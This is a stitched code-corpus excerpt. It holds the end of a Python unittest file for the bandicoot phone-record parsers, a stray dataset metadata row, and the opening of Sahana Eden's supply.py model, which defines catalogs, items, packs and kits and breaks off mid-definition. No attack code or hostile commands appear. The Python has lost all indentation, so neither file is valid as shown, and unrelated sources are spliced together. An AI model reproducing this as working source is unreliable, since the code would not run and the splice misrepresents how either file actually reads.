def setUp(self):
if not TestParsers._dir_changed:
abspath = os.path.abspath(__file__)
name = abspath.index(os.path.basename(__file__))
abspath = abspath[:name]
os.chdir(abspath)
TestParsers._dir_changed = True
def test_read_orange(self):
user = bc.io.read_orange("u_test", "samples", describe=False)
self.assertEqual(len(user.records), 500)
def test_read_csv(self):
user = bc.read_csv("u_test2", "samples", describe=False)
self.assertEqual(len(user.records), 500)
def test_read_csv_with_recharges(self):
user = bc.read_csv("A", "samples/manual", describe=False,
recharges_path="samples/manual/recharges")
self.assertEqual(len(user.recharges), 5)
def test_read_csv_antenna_id_no_places(self):
user = bc.read_csv("u_test_antennas", "samples", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position('13084', None)))
result = {'allweek': {'allday': None}}
radius = bc.spatial.radius_of_gyration(user, groupby=None)
self.assertEqual(radius, result)
def test_read_csv_antenna_id(self):
user = bc.read_csv("u_test_antennas", "samples",
antennas_path="samples/towers.csv", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position('13084', None)))
radius = bc.spatial.radius_of_gyration(user, groupby=None)
self.assertGreater(radius['allweek']['allday'], 0)
def test_read_csv_no_position(self):
user = bc.read_csv("u_test_no_position", "samples", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position()))
def test_read_csv_attributes(self):
user = bc.read_csv("u_test2", "samples",
attributes_path="samples/attributes", describe=False)
self.assertEqual(user.attributes, {
'gender': 'male',
'age': '42',
'is_subscriber': 'True',
'individual_id': '7atr8f53fg41'
})
def test_read_duration_format(self):
raw = {
'antenna_id': '11201|11243',
'call_duration': '873',
'correspondent_id': 'A',
'datetime': '2014-06-01 01:00:00',
'direction': 'out',
'interaction': 'call'
}
rv = bc.io._parse_record(raw, duration_format='seconds').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = '00:14:33'
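        # '00:14:33' parsed with '%H:%M:%S' is 14*60 + 33 = 873 seconds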
rv = bc.io._parse_record(raw, duration_format='%H:%M:%S').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = '1433'
rv = bc.io._parse_record(raw, duration_format='%M%S').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = ''
rv = bc.io._parse_record(raw, duration_format='seconds').call_duration
self.assertEqual(rv, None)
| mit | 3,988,811,326,115,238,400 | 39.06015 | 80 | 0.579955 | false |
flavour/ifrc_qa | modules/s3db/supply.py | 1 | 104079 | # -*- coding: utf-8 -*-
""" Sahana Eden Supply Model
@copyright: 2009-2016 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3SupplyModel",
"S3SupplyDistributionModel",
"supply_item_rheader",
"supply_item_controller",
"supply_item_entity_controller",
"supply_catalog_rheader",
"supply_item_entity_category",
"supply_item_entity_country",
"supply_item_entity_organisation",
"supply_item_entity_contacts",
"supply_item_entity_status",
"supply_ItemRepresent",
#"supply_ItemCategoryRepresent",
"supply_get_shipping_code",
)
import re
from gluon import *
from gluon.storage import Storage
from ..s3 import *
from s3dal import Row
from s3layouts import S3PopupLink
# @ToDo: Put the most common patterns at the top to optimise
um_patterns = ["\sper\s?(.*)$", # CHOCOLATE, per 100g
#"\((.*)\)$", # OUTWARD REGISTER for shipping (50 sheets)
"([0-9]+\s?(gramm?e?s?|L|g|kg))$", # Navarin de mouton 285 grammes
",\s(kit|pair|btl|bottle|tab|vial)\.?$", # STAMP, IFRC, Englishlue, btl.
"\s(bottle)\.?$", # MINERAL WATER, 1.5L bottle
",\s((bag|box|kit) of .*)\.?$", # (bag, diplomatic) LEAD SEAL, bag of 100
]
# =============================================================================
class S3SupplyModel(S3Model):
"""
Generic Supply functionality such as catalogs and items that is used
across multiple modules.
@ToDo: Break this class up where possible
- is this just supply_item_alt?
"""
names = ("supply_brand",
"supply_catalog",
"supply_item_category",
"supply_item_category_id",
"supply_item",
"supply_item_entity",
"supply_catalog_item",
"supply_item_pack",
"supply_item_alt",
"supply_item_id",
"supply_item_entity_id",
"supply_item_pack_id",
"supply_kit_item",
"supply_item_represent",
"supply_item_category_represent",
"supply_item_add",
"supply_item_pack_quantity",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
# Shortcuts
add_components = self.add_components
configure = self.configure
crud_strings = s3.crud_strings
define_table = self.define_table
super_link = self.super_link
float_represent = IS_FLOAT_AMOUNT.represent
NONE = current.messages["NONE"]
format = auth.permission.format
if format == "html":
i18n = {"in_inv": T("in Stock"),
"no_packs": T("No Packs for Item"),
}
s3.js_global.append('''i18n.in_inv="%s"''' % i18n["in_inv"])
s3.js_global.append('''i18n.no_packs="%s"''' % i18n["no_packs"])
# =====================================================================
# Brand
#
tablename = "supply_brand"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_NOT_ONE_OF(db,
"%s.name" % tablename,
),
],
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_BRAND = T("Create Brand")
crud_strings[tablename] = Storage(
label_create = ADD_BRAND,
title_display = T("Brand Details"),
title_list = T("Brands"),
title_update = T("Edit Brand"),
label_list_button = T("List Brands"),
label_delete_button = T("Delete Brand"),
msg_record_created = T("Brand added"),
msg_record_modified = T("Brand updated"),
msg_record_deleted = T("Brand deleted"),
msg_list_empty = T("No Brands currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename)
brand_id = S3ReusableField("brand_id", "reference %s" % tablename,
label = T("Brand"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_brand.id",
represent,
sort=True)
),
sortby = "name",
comment = S3PopupLink(c = "supply",
f = "brand",
label = ADD_BRAND,
title = T("Brand"),
tooltip = T("The list of Brands are maintained by the Administrators."),
),
)
# =====================================================================
# Catalog (of Items)
#
tablename = "supply_catalog"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_NOT_ONE_OF(db,
"%s.name" % tablename,
),
],
),
self.org_organisation_id(),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_CATALOG = T("Create Catalog")
crud_strings[tablename] = Storage(
label_create = ADD_CATALOG,
title_display = T("Catalog Details"),
title_list = T("Catalogs"),
title_update = T("Edit Catalog"),
label_list_button = T("List Catalogs"),
label_delete_button = T("Delete Catalog"),
msg_record_created = T("Catalog added"),
msg_record_modified = T("Catalog updated"),
msg_record_deleted = T("Catalog deleted"),
msg_list_empty = T("No Catalogs currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename)
catalog_id = S3ReusableField("catalog_id", "reference %s" % tablename,
default = 1,
label = T("Catalog"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_catalog.id",
represent,
sort=True,
# Restrict to catalogs the user can update
updateable=True,
)),
sortby = "name",
comment=S3PopupLink(c = "supply",
f = "catalog",
label = ADD_CATALOG,
title = T("Catalog"),
tooltip = T("The list of Catalogs are maintained by the Administrators."),
),
)
# Components
add_components(tablename,
# Categories
supply_item_category = "catalog_id",
# Catalog Items
supply_catalog_item = "catalog_id",
)
# =====================================================================
# Item Category
#
asset = settings.has_module("asset")
telephone = settings.get_asset_telephones()
vehicle = settings.has_module("vehicle")
item_category_represent = supply_ItemCategoryRepresent()
item_category_represent_nocodes = \
supply_ItemCategoryRepresent(use_code=False)
if format == "xls":
parent_represent = item_category_represent_nocodes
else:
parent_represent = item_category_represent
tablename = "supply_item_category"
define_table(tablename,
catalog_id(),
#Field("level", "integer"),
Field("parent_item_category_id",
"reference supply_item_category",
label = T("Parent"),
ondelete = "RESTRICT",
represent = parent_represent,
),
Field("code", length=16,
label = T("Code"),
#required = True,
),
Field("name", length=128,
label = T("Name"),
),
Field("can_be_asset", "boolean",
default = True,
label = T("Items in Category can be Assets"),
represent = s3_yes_no_represent,
readable = asset,
writable = asset,
),
Field("is_telephone", "boolean",
default = False,
label = T("Items in Category are Telephones"),
represent = s3_yes_no_represent,
readable = telephone,
writable = telephone,
),
Field("is_vehicle", "boolean",
default = False,
label = T("Items in Category are Vehicles"),
represent = s3_yes_no_represent,
readable = vehicle,
writable = vehicle,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ITEM_CATEGORY = T("Create Item Category")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM_CATEGORY,
title_display = T("Item Category Details"),
title_list = T("Item Categories"),
title_update = T("Edit Item Category"),
label_list_button = T("List Item Categories"),
label_delete_button = T("Delete Item Category"),
msg_record_created = T("Item Category added"),
msg_record_modified = T("Item Category updated"),
msg_record_deleted = T("Item Category deleted"),
msg_list_empty = T("No Item Categories currently registered"))
# Reusable Field
item_category_requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_item_category.id",
item_category_represent_nocodes,
sort=True)
)
item_category_comment = S3PopupLink(c = "supply",
f = "item_category",
label = ADD_ITEM_CATEGORY,
title = T("Item Category"),
tooltip = ADD_ITEM_CATEGORY,
)
# @todo: make lazy_table
table = db[tablename]
table.parent_item_category_id.requires = item_category_requires
item_category_id = S3ReusableField("item_category_id", "reference %s" % tablename,
comment = item_category_comment,
label = T("Category"),
ondelete = "RESTRICT",
represent = item_category_represent,
requires = item_category_requires,
sortby = "name",
)
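        # Client-side: filter the Item Category dropdown to the selected Catalog (via filterOptionsS3)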
item_category_script = '''
$.filterOptionsS3({
'trigger':'catalog_id',
'target':'item_category_id',
'lookupPrefix':'supply',
'lookupResource':'item_category',
})'''
# Components
add_components(tablename,
# Child categories
supply_item_category = "parent_item_category_id",
)
configure(tablename,
deduplicate = self.supply_item_category_duplicate,
onvalidation = self.supply_item_category_onvalidate,
)
# =====================================================================
# Item
#
# These are Template items
# Instances of these become Inventory Items & Request items
#
tablename = "supply_item"
define_table(tablename,
catalog_id(),
# Needed to auto-create a catalog_item
item_category_id(
script = item_category_script
),
Field("name", length=128, notnull=True,
label = T("Name"),
requires = IS_NOT_EMPTY(),
),
Field("code", length=16,
label = T("Code"),
represent = lambda v: v or NONE,
),
Field("um", length=128, notnull=True,
default = "piece",
label = T("Unit of Measure"),
requires = IS_NOT_EMPTY(),
),
brand_id(),
Field("kit", "boolean",
default = False,
label = T("Kit?"),
represent = lambda opt: \
(opt and [T("Yes")] or [NONE])[0],
),
Field("model", length=128,
label = T("Model/Type"),
represent = lambda v: v or NONE,
),
Field("year", "integer",
label = T("Year of Manufacture"),
represent = lambda v: v or NONE,
),
Field("weight", "double",
label = T("Weight (kg)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("length", "double",
label = T("Length (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("width", "double",
label = T("Width (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("height", "double",
label = T("Height (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("volume", "double",
label = T("Volume (m3)"),
represent = lambda v: \
float_represent(v, precision=2),
),
# These comments do *not* pull through to an Inventory's Items or a Request's Items
s3_comments(),
*s3_meta_fields())
# Categories in Progress
#table.item_category_id_0.label = T("Category")
#table.item_category_id_1.readable = table.item_category_id_1.writable = False
#table.item_category_id_2.readable = table.item_category_id_2.writable = False
# CRUD strings
ADD_ITEM = T("Create Item")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM,
title_display = T("Item Details"),
title_list = T("Items"),
title_update = T("Edit Item"),
label_list_button = T("List Items"),
label_delete_button = T("Delete Item"),
msg_record_created = T("Item added"),
msg_record_modified = T("Item updated"),
msg_record_deleted = T("Item deleted"),
msg_list_empty = T("No Items currently registered"),
msg_match = T("Matching Items"),
msg_no_match = T("No Matching Items")
)
supply_item_represent = supply_ItemRepresent(show_link=True)
# Reusable Field
supply_item_id = S3ReusableField("item_id",
"reference %s" % tablename, # 'item_id' for backwards-compatibility
label = T("Item"),
ondelete = "RESTRICT",
represent = supply_item_represent,
requires = IS_ONE_OF(db, "supply_item.id",
supply_item_represent,
sort=True),
sortby = "name",
widget = S3AutocompleteWidget("supply", "item"),
comment=S3PopupLink(c = "supply",
f = "item",
label = ADD_ITEM,
title = T("Item"),
tooltip = T("Type the name of an existing catalog item OR Click 'Create Item' to add an item which is not in the catalog."),
),
)
# ---------------------------------------------------------------------
filter_widgets = [
S3TextFilter(["code",
"name",
"model",
#"item_category_id$name",
"comments",
],
label = T("Search"),
comment = T("Search for an item by its code, name, model and/or comment."),
#_class = "filter-search",
),
S3OptionsFilter("brand_id",
# @ToDo: Introspect need for header based on # records
#header = True,
#label = T("Brand"),
represent = "%(name)s",
widget = "multiselect",
),
S3OptionsFilter("year",
comment = T("Search for an item by Year of Manufacture."),
# @ToDo: Introspect need for header based on # records
#header = True,
label = T("Year"),
widget = "multiselect",
),
]
report_options = Storage(defaults=Storage(rows="name",
cols="item_category_id",
fact="count(brand_id)",
),
)
# Default summary
summary = [{"name": "addform",
"common": True,
"widgets": [{"method": "create"}],
},
{"name": "table",
"label": "Table",
"widgets": [{"method": "datatable"}]
},
{"name": "report",
"label": "Report",
"widgets": [{"method": "report",
"ajax_init": True}]
},
]
configure(tablename,
deduplicate = self.supply_item_duplicate,
filter_widgets = filter_widgets,
onaccept = self.supply_item_onaccept,
orderby = "supply_item.name",
report_options = report_options,
summary = summary,
)
# Components
add_components(tablename,
# Catalog Items
supply_catalog_item = "item_id",
# Packs
supply_item_pack = "item_id",
# Inventory Items
inv_inv_item = "item_id",
# Order Items
inv_track_item = "item_id",
# Procurement Plan Items
proc_plan_item = "item_id",
# Request Items
req_req_item = "item_id",
# Supply Kit Items
supply_kit_item = "parent_item_id",
# Supply Kit Items (with link table)
#supply_item = {"name": "kit_item",
# "link": "supply_kit_item",
# "joinby": "parent_item_id",
# "key": "item_id"
# "actuate": "hide",
# },
)
# Optional components
if settings.get_supply_use_alt_name():
add_components(tablename,
# Alternative Items
supply_item_alt="item_id",
)
# =====================================================================
# Catalog Item
#
# This resource is used to link Items with Catalogs (n-to-n)
# Item Categories are also Catalog specific
#
tablename = "supply_catalog_item"
define_table(tablename,
catalog_id(),
item_category_id(
script = item_category_script
),
supply_item_id(script=None), # No Item Pack Filter
s3_comments(), # These comments do *not* pull through to an Inventory's Items or a Request's Items
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Catalog Item"),
title_display = T("Item Catalog Details"),
title_list = T("Catalog Items"),
title_update = T("Edit Catalog Item"),
title_upload = T("Import Catalog Items"),
label_list_button = T("List Catalog Items"),
label_delete_button = T("Delete Catalog Item"),
msg_record_created = T("Catalog Item added"),
msg_record_modified = T("Catalog Item updated"),
msg_record_deleted = T("Catalog Item deleted"),
msg_list_empty = T("No Catalog Items currently registered"),
msg_match = T("Matching Catalog Items"),
msg_no_match = T("No Matching Catalog Items")
)
# Filter Widgets
filter_widgets = [
S3TextFilter([#These lines are causing issues...very slow - perhaps broken
#"comments",
#"item_category_id$code",
#"item_category_id$name",
#"item_id$brand_id$name",
#"item_category_id$parent_item_category_id$code"
#"item_category_id$parent_item_category_id$name"
"item_id$code",
"item_id$name",
"item_id$model",
"item_id$comments"
],
label = T("Search"),
comment = T("Search for an item by its code, name, model and/or comment."),
),
S3OptionsFilter("catalog_id",
label = T("Catalog"),
comment = T("Search for an item by catalog."),
#represent ="%(name)s",
cols = 3,
hidden = True,
),
S3OptionsFilter("item_category_id",
label = T("Category"),
comment = T("Search for an item by category."),
represent = item_category_represent_nocodes,
cols = 3,
hidden = True,
),
S3OptionsFilter("item_id$brand_id",
label = T("Brand"),
comment = T("Search for an item by brand."),
#represent ="%(name)s",
cols = 3,
hidden = True,
),
]
configure(tablename,
deduplicate = self.supply_catalog_item_duplicate,
filter_widgets = filter_widgets,
)
# =====================================================================
# Item Pack
#
# Items can be distributed in different containers
#
tablename = "supply_item_pack"
define_table(tablename,
supply_item_id(empty=False),
Field("name", length=128,
notnull=True, # Ideally this would reference another table for normalising Pack names
default = T("piece"),
label = T("Name"),
requires = IS_NOT_EMPTY(),
),
Field("quantity", "double", notnull=True,
default = 1,
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ITEM_PACK = T("Create Item Pack")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM_PACK,
title_display = T("Item Pack Details"),
title_list = T("Item Packs"),
title_update = T("Edit Item Pack"),
label_list_button = T("List Item Packs"),
label_delete_button = T("Delete Item Pack"),
msg_record_created = T("Item Pack added"),
msg_record_modified = T("Item Pack updated"),
msg_record_deleted = T("Item Pack deleted"),
msg_list_empty = T("No Item Packs currently registered"))
# ---------------------------------------------------------------------
# Reusable Field
item_pack_represent = supply_ItemPackRepresent(lookup="supply_item_pack")
item_pack_id = S3ReusableField("item_pack_id", "reference %s" % tablename,
label = T("Pack"),
ondelete = "RESTRICT",
represent = item_pack_represent,
# Do not display any packs initially
# will be populated by filterOptionsS3
requires = IS_ONE_OF_EMPTY_SELECT(db,
"supply_item_pack.id",
item_pack_represent,
sort=True,
# @ToDo: Enforce "Required" for imports
# @ToDo: Populate based on item_id in controller instead of IS_ONE_OF_EMPTY_SELECT
# filterby = "item_id",
# filter_opts = (....),
),
script = '''
$.filterOptionsS3({
'trigger':'item_id',
'target':'item_pack_id',
'lookupPrefix':'supply',
'lookupResource':'item_pack',
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})''',
sortby = "name",
#comment=S3PopupLink(c = "supply",
# f = "item_pack",
# label = ADD_ITEM_PACK,
# title = T("Item Packs"),
# tooltip = T("The way in which an item is normally distributed"),
# ),
)
configure(tablename,
deduplicate = self.supply_item_pack_duplicate,
)
# Components
add_components(tablename,
# Inventory Items
inv_inv_item = "item_pack_id",
)
# =====================================================================
# Supply Kit Item Table
#
# For defining what items are in a kit
tablename = "supply_kit_item"
define_table(tablename,
supply_item_id("parent_item_id",
label = T("Parent Item"),
comment = None,
),
supply_item_id("item_id",
label = T("Kit Item"),
),
Field("quantity", "double",
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
),
item_pack_id(),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Add Item to Kit"),
title_display = T("Kit Item Details"),
title_list = T("Kit Items"),
title_update = T("Edit Kit Item"),
label_list_button = T("List Kit Items"),
label_delete_button = T("Remove Item from Kit"),
msg_record_created = T("Item added to Kit"),
msg_record_modified = T("Kit Item updated"),
msg_record_deleted = T("Item removed from Kit"),
msg_list_empty = T("No Items currently in this Kit"))
# =====================================================================
# Alternative Items
#
# If the desired item isn't found, then these are designated as
# suitable alternatives
#
tablename = "supply_item_alt"
define_table(tablename,
supply_item_id(notnull=True),
Field("quantity", "double", notnull=True,
default = 1,
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
comment = DIV(_class = "tooltip",
_title = "%s|%s" %
(T("Quantity"),
T("The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item")
)
),
),
supply_item_id("alt_item_id", notnull=True),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Alternative Item"),
title_display = T("Alternative Item Details"),
title_list = T("Alternative Items"),
title_update = T("Edit Alternative Item"),
label_list_button = T("List Alternative Items"),
label_delete_button = T("Delete Alternative Item"),
msg_record_created = T("Alternative Item added"),
msg_record_modified = T("Alternative Item updated"),
msg_record_deleted = T("Alternative Item deleted"),
msg_list_empty = T("No Alternative Items currently registered"))
# =====================================================================
# Item Super-Entity
#
# This super entity provides a common way to provide a foreign key to supply_item
# - it allows searching/reporting across Item types easily.
#
item_types = Storage(asset_asset = T("Asset"),
asset_item = T("Asset Item"),
inv_inv_item = T("Warehouse Stock"),
inv_track_item = T("Order Item"),
proc_plan_item = T("Planned Procurement Item"),
)
tablename = "supply_item_entity"
self.super_entity(tablename, "item_entity_id", item_types,
# @ToDo: Make Items Trackable?
#super_link("track_id", "sit_trackable"),
#location_id(),
supply_item_id(),
item_pack_id(),
Field("quantity", "double", notnull=True,
default = 1.0,
label = T("Quantity"),
),
*s3_ownerstamp())
# Reusable Field
item_id = super_link("item_entity_id", "supply_item_entity",
#writable = True,
#readable = True,
#label = T("Status"),
#represent = item_represent,
# Comment these to use a Dropdown & not an Autocomplete
#widget = S3ItemAutocompleteWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Item"),
# current.messages.AUTOCOMPLETE_HELP))
)
# Filter Widgets
filter_widgets = [
S3TextFilter(name = "item_entity_search_text",
label = T("Search"),
comment = T("Search for an item by text."),
field = ["item_id$name",
#"item_id$item_category_id$name",
#"site_id$name"
]
),
S3OptionsFilter("item_id$item_category_id",
label = T("Code Share"),
comment = T("If none are selected, then all are searched."),
#represent = "%(name)s",
cols = 2,
),
#S3OptionsFilter("country",
# label = current.messages.COUNTRY,
# comment = T("If none are selected, then all are searched."),
# #represent = "%(name)s",
# cols = 2,
# ),
]
# Configuration
configure(tablename,
filter_widgets = filter_widgets,
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(supply_item_id = supply_item_id,
supply_item_entity_id = item_id,
supply_item_category_id = item_category_id,
supply_item_pack_id = item_pack_id,
supply_item_represent = supply_item_represent,
supply_item_category_represent = item_category_represent,
supply_item_pack_quantity = SupplyItemPackQuantity,
supply_item_add = self.supply_item_add,
supply_item_pack_represent = item_pack_represent,
)
# -------------------------------------------------------------------------
@staticmethod
def defaults():
""" Return safe defaults for names in case the model is disabled """
supply_item_id = S3ReusableField("item_id", "integer",
writable=False,
readable=False)
supply_item_category_id = S3ReusableField("item_category_id", "integer",
writable=False,
readable=False)
item_id = S3ReusableField("item_entity_id", "integer",
writable=False,
readable=False)()
item_pack_id = S3ReusableField("item_pack_id", "integer",
writable=False,
readable=False)
return dict(supply_item_id = supply_item_id,
supply_item_category_id = supply_item_category_id,
supply_item_entity_id = item_id,
supply_item_pack_id = item_pack_id,
supply_item_pack_quantity = lambda tablename: lambda row: 0,
)
# -------------------------------------------------------------------------
@staticmethod
def supply_item_category_onvalidate(form):
"""
Checks that either a Code OR a Name are entered
"""
# If there is a tracking number check that it is unique within the org
if not (form.vars.code or form.vars.name):
errors = form.errors
errors.code = errors.name = current.T("An Item Category must have a Code OR a Name.")
# -------------------------------------------------------------------------
@staticmethod
def supply_item_add(quantity_1, pack_quantity_1,
quantity_2, pack_quantity_2):
"""
Adds item quantities together, accounting for different pack
quantities.
Returned quantity according to pack_quantity_1
Used by controllers/inv.py & modules/s3db/inv.py
"""
if pack_quantity_1 == pack_quantity_2:
# Faster calculation
quantity = quantity_1 + quantity_2
else:
quantity = ((quantity_1 * pack_quantity_1) +
(quantity_2 * pack_quantity_2)) / pack_quantity_1
return quantity
# -------------------------------------------------------------------------
@staticmethod
def item_represent(id):
"""
Represent an item entity in option fields or list views
- unused, we use VirtualField instead
@ToDo: Migrate to S3Represent
"""
if not id:
return current.messages["NONE"]
db = current.db
if isinstance(id, Row) and "instance_type" in id:
# Do not repeat the lookup if already done by IS_ONE_OF
item = id
instance_type = item.instance_type
else:
item_table = db.supply_item_entity
item = db(item_table._id == id).select(item_table.instance_type,
limitby=(0, 1)).first()
try:
instance_type = item.instance_type
except:
return current.messages.UNKNOWN_OPT
T = current.T
if instance_type == "inv_inv_item":
item_str = T("In Stock")
elif instance_type == "inv_track_item":
s3db = current.s3db
itable = s3db[instance_type]
rtable = s3db.inv_recv
query = (itable.item_entity_id == id) & \
(rtable.id == itable.recv_id)
eta = db(query).select(rtable.eta,
limitby=(0, 1)).first().eta
item_str = T("Due %(date)s") % dict(date=eta)
else:
return current.messages.UNKNOWN_OPT
return item_str
# -------------------------------------------------------------------------
@staticmethod
def supply_item_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
code = data.get("code")
if code:
# Same Code => definitely duplicate
table = item.table
query = (table.deleted != True) & \
(table.code.lower() == code.lower())
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
else:
name = data.get("name")
if not name:
# No way to match
return
um = data.get("um")
if not um:
# Try to extract UM from Name
name, um = item_um_from_name(name)
table = item.table
query = (table.deleted != True) & \
(table.name.lower() == name.lower())
if um:
query &= (table.um.lower() == um.lower())
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_category_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
name = data.get("name")
if name:
query &= (table.name.lower() == name.lower())
code = data.get("code")
if code:
query &= (table.code.lower() == code.lower())
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
        parent_item_category_id = data.get("parent_item_category_id")
        if parent_item_category_id:
            query &= (table.parent_item_category_id == parent_item_category_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_catalog_item_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
item_id = data.get("item_id")
if item_id:
query &= (table.item_id == item_id)
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
item_category_id = data.get("item_category_id")
if item_category_id:
query &= (table.item_category_id == item_category_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_pack_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
name = data.get("name")
if name:
query &= (table.name.lower() == name.lower())
item_id = data.get("item_id")
if item_id:
query &= (table.item_id == item_id)
quantity = data.get("quantity")
if quantity:
query &= (table.quantity == quantity)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_onaccept(form):
"""
Create a catalog_item for this item
Update the UM (Unit of Measure) in the supply_item_pack table
"""
db = current.db
vars = form.vars
item_id = vars.id
catalog_id = vars.catalog_id
catalog_item_id = None
citable = db.supply_catalog_item
query = (citable.item_id == item_id) & \
(citable.deleted == False )
        rows = db(query).select(citable.id)
if not len(rows):
# Create supply_catalog_item
catalog_item_id = \
citable.insert(catalog_id = catalog_id,
item_category_id = vars.item_category_id,
item_id = item_id
)
# Update if the catalog/category has changed - if there is only supply_catalog_item
elif len(rows) == 1:
catalog_item_id = rows.first().id
catalog_item_id = \
db(citable.id == catalog_item_id
).update(catalog_id = catalog_id,
item_category_id = vars.item_category_id,
item_id = item_id
)
#current.auth.s3_set_record_owner(citable, catalog_item_id, force_update=True)
# Update UM
um = vars.um or db.supply_item.um.default
table = db.supply_item_pack
# Try to update the existing record
query = (table.item_id == item_id) & \
(table.quantity == 1) & \
(table.deleted == False)
if db(query).update(name = um) == 0:
# Create a new item packet
table.insert(item_id = item_id,
name = um,
quantity = 1)
if vars.kit:
# Go to that tab afterwards
url = URL(args=["[id]", "kit_item"])
current.s3db.configure("supply_item",
create_next=url,
update_next=url,
)
# =============================================================================
class S3SupplyDistributionModel(S3Model):
"""
Supply Distribution Model
- depends on Stats module
A Distribution is an Item (which could be a Kit) distributed to a single Location
- usually as part of an Activity
"""
names = ("supply_distribution_item",
"supply_distribution",
)
def model(self):
settings = current.deployment_settings
if not settings.has_module("stats"):
# Distribution Model needs Stats module enabling
return {}
T = current.T
db = current.db
s3 = current.response.s3
configure = self.configure
crud_strings = s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Distribution Item: supply items which can be distributed
#
tablename = "supply_distribution_item"
define_table(tablename,
super_link("parameter_id", "stats_parameter"),
self.supply_item_entity_id,
self.supply_item_id(ondelete = "RESTRICT",
required = True,
),
# @ToDo: Hide this field & populate onaccept from the item_id represent
Field("name", length=128, unique=True,
#label = T("Distribution Item Name"),
label = T("Label"),
